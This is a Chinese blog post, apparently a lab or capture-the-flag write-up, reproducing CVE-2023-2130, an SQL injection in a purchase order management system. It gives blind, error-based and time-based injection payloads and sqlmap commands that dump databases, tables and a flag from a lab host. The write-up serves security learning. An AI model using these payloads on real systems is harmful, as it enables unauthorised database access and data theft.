【春秋云镜】CVE-2023-2130漏洞复现exp

轨迹H2025-06-10 15:26

目录标题

漏洞介绍

​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

影响版本

sql 复制代码 
SourceCodester采购订单管理系统1.0

EXP

sqlmap

bash 复制代码 
Parameter: id (GET)
    Type: boolean-based blind   #布尔盲注
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8712=8712 AND 'qmcT'='qmcT

    Type: error-based        #报错注入
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM
    #floor():利用 GROUP BY 分组时的随机数冲突,触发错误
    Type: time-based blind    #时间盲注
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD

漏洞复现

一个登录框

抓包登录,回显有内容

存在sql查询语句

查找users表下username=admin,且password=132456的md5值的结果

bash 复制代码 
{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}

访问该路径

bash 复制代码 
http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

跟上id参数后出现回显,调用了数据库信息

简单测了一下,单引号存在注入,**--+**可以注释

使用sqlmap去跑,跑数据库

bash 复制代码 
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs 
available databases [4]:
[*] information_schema 
[*] mysql
[*] performance_schema
[*] purchase_order_db

爆数据表

bash 复制代码 
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

fllllaaaag表下的数据

bash 复制代码 
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump

或者爆fllllaaaag表下的列

bash 复制代码 
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

然后再爆破具体的内容

bash 复制代码 
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump

flag

bash 复制代码 
flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d}
相关推荐
m0_466049972 小时前
Webgoat-(A1)Broken Access Control:Hijack a session
web安全·网络安全
梁辰兴2 小时前
计算机网络基础:局域网的数据链路层
网络·网络协议·计算机网络·计算机·数据链路层·局域网·梁辰兴
老王熬夜敲代码2 小时前
IP和MAC的深入理解
linux·网络·笔记·网络协议
Chengbei112 小时前
CVE-2025-24813 Tomcat 最新 RCE 分析复现
java·安全·web安全·网络安全·tomcat·系统安全·网络攻击模型
小熊哥^--^2 小时前
谈谈对传输层协议TCP的理解
网络·网络协议·tcp/ip
JM丫2 小时前
buuctf-ciscn_2019_es_2(栈迁移)
ctf
缺的不是资料,是学习的心2 小时前
vmware虚拟机ens33拿不到ip,已经开启dhcp了
网络·网络协议·tcp/ip
Boop_wu3 小时前
[Java EE] 网络原理(2) http
网络·网络协议·http
fulufulucode3 小时前
【网络协议】HTTPS相关知识详细梳理
网络·网络协议
QZ166560951593 小时前
2025年国内精细化、可交互、轻量级的泛监测体系产品推荐
网络安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05BongoCat - 跨平台键盘猫动画工具06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07Labelme从安装到标注:零基础完整指南08jdk21下载、安装(Windows、Linux、macOS)09CentOS的ISO镜像下载10Open-AutoGLM Windows 安装部署教程